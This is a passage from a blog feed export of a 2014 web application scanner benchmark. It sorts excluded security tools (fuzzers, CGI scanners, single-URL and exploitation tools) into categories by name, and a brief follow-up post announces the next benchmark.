&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;d0rk3r&lt;/b&gt; by &lt;b&gt;b4ltazar&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Deprecated Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Incomplete tools that were not maintained for a very long
time; currently includes the following tools (and might include more):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Wpoison&lt;/b&gt; (development stopped in 2003, the new
official version was never released, although the 2002 development version can
be obtained by manually composing the sourceforge URL which does not appear in
the web site- &lt;/span&gt;&lt;a href=&quot;http://sourceforge.net/projects/wpoison/files/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;http://sourceforge.net/projects/wpoison/files/&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; )&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;De facto Fuzzers&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Tools that scan applications in a similar way to a scanner,
but where the scanner attempts to conclude whether or not the application or is
vulnerable (according to some sort of “intelligent” set of rules), the fuzzer
simply collects abnormal responses to various inputs and behaviors, leaving the
task of concluding to the human user.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Lilith 0.4c/0.6a &lt;/b&gt;(both versions 0.4c and 0.6a were
tested, and although the tool seems to be a scanner at first glimpse, it
doesn’t perform any intelligent analysis on the results).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Spike proxy&lt;/b&gt; &lt;b&gt;1.48&lt;/b&gt; (although the tool has XSS
and SQLi scan features, it acts like a fuzzer more then it acts like a scanner
– it sends payloads of partial XSS and SQLi, and does not verify that the
context of the returned output is sufficient for execution or that the error
presented by the server is related to a database syntax injection, leaving the
verification task for the user).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Fuzzers&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scanning tools that lack the independent ability to conclude
whether a given response represents a vulnerable location, by using some sort
of verification method (this category includes tools such as JBroFuzz,
Firefuzzer, Proxmon, st4lk3r, etc). Fuzzers that had at least one type of
exposure that was verified were included in the benchmark (Powerfuzzer).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;CGI Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Vulnerability scanners that focus on detecting hardening
flaws and version specific hazards in web infrastructures (Nikto, Wikto, WHCC,
st4lk3r, N-Stealth, etc)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Single URL Vulnerability Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Scanners that can only scan one URL at a time, or can only
scan information from a google dork (uncontrollable):&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Havij (by itsecteam.com)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Hexjector (by hkhexon)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Simple XSS Fuzzer [SiXFu] (by www.EvilFingers.com)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Mysqloit (by muhaimindz)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;PHP Fuzzer (by RoMeO from DarkMindZ)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;SQLi-Scanner (by Valentin Hoebel)&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)Etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Vulnerability Detection Toolkits&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Tools that aid in discovering vulnerabilities, but do not
detect the vulnerability themselves; for example:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://labs.securitycompass.com/exploit-me/&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Exploit-Me
Suite&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (XSS-Me, SQL Inject-Me, Access-Me)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;http://xss.codeplex.com/wikipage?title=tutorial&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Fiddler X5s plugin&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;/span&gt;&lt;a href=&quot;https://chrome.google.com/webstore/detail/kkopfbcgaebdaklghbnfmjeeonmabidj&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSSRays&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
(chrome Addon)&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Exploitation Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Tools that can exploit vulnerabilities without any
independent ability to automatically detect vulnerabilities on a large scale.
Examples:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;MultiInjector&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;XSS-Proxy-Scanner&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Pangolin&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;FGInjector&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Absinth&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;Safe3 SQL Injector&lt;/b&gt; (an exploitation tool with
scanning features (pentest mode) that are &lt;b&gt;not available&lt;/b&gt; in the free
version)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)Etc.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Exceptional Cases&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;(*)&lt;b&gt;SecurityQA Toolbar (iSec)&lt;/b&gt; – various lists and
rumors include this tool in the collection of free/open-source vulnerability
scanners, but I wasn’t able to obtain it from the vendor’s web site, or from
any other legitimate source, so I’m not really sure it fits the “free to use”
category.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://sectooladdict.blogspot.com/feeds/2101745225525962438/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://sectooladdict.blogspot.com/2014/02/wavsep-web-application-scanner.html#comment-form' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2101745225525962438'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3792178847867987053/posts/default/2101745225525962438'/><link rel='alternate' type='text/html' href='http://sectooladdict.blogspot.com/2014/02/wavsep-web-application-scanner.html' title='WAVSEP Web Application Scanner Benchmark 2014'/><author><name>Shay Chen</name><uri>http://www.blogger.com/profile/16490521389991462247</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9QLJKh4Z6I4puwxVoOzyuqVc4ZRYmL_XcS3dLCeIsRcdoEmwnZQejnW8__iitHgbTYcmCefW7UEtQPpZdbtqX0cnPCYn7Ws913obv19u44x89xHY8a-9JqfkdxyBXg/s220/n847114298_305931_3159.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnNXgwA3V3EbGbHURHxzQLfuNE2tixZs9L67UBHLnu4BZEK71qWnaTszwdIIwEbz6oPEUXFnKpDLJ3X_BoxJAlMmKXOF1E0bq_0Kc-LQ5_ZVXDyv0oPSpHjMfpsj0yRv03Xq3mZDUcMi0/s72-c/DG_vert_col_strong.jpg" height="72" width="72"/><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-8732302219326883434</id><published>2013-12-10T01:58:00.000-08:00</published><updated>2013-12-10T01:58:31.498-08:00</updated><title type='text'>The 2013 scanner benchmark is coming soon!</title><content type='html'>To all those who are interested in the latest an greatest, I&#39;m currently working on the 2013/2014 web application scanner benchmark, and already I&#39;m seeing some VERY interesting results.&lt;br /&gt;
&lt;br /&gt;
The benchmark will be published soon, and I&#39;m posting many of the results during the assessment process using the comparison twitter account &lt;a href=&quot;https://twitter.com/sectoolmarket&quot; target=&quot;_blank&quot;&gt;@sectoolmarket&lt;/a&gt;, which also publishes news about other information security product comparisons performed around the globe.&lt;br /&gt;
&lt;br /&gt;
This time, I received plenty of help from multiple entities -&lt;br /&gt;
&lt;br /&gt;
Many entities (including the ZAP project and IronWASP project) contributed test cases to wavsep (not included in this benchmark scope, but might be in the next),&lt;br /&gt;
&lt;br /&gt;
Several researchers around the globe offered their help in the assessment process (encouraging me to work on something that will someday make it easier),&lt;br /&gt;
&lt;br /&gt;
And last but not least, I received plenty of help from the wonderful guys at &lt;a href=&quot;http://www.denimgroup.com/&quot; target=&quot;_blank&quot;&gt;Denim group&lt;/a&gt;, which did their best to adjust &lt;a href=&quot;https://code.google.com/p/threadfix/&quot; target=&quot;_blank&quot;&gt;ThreadFix&lt;/a&gt; so I can use it to make the task of comparing and counting results easier (just started checking it - looks great so far)&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
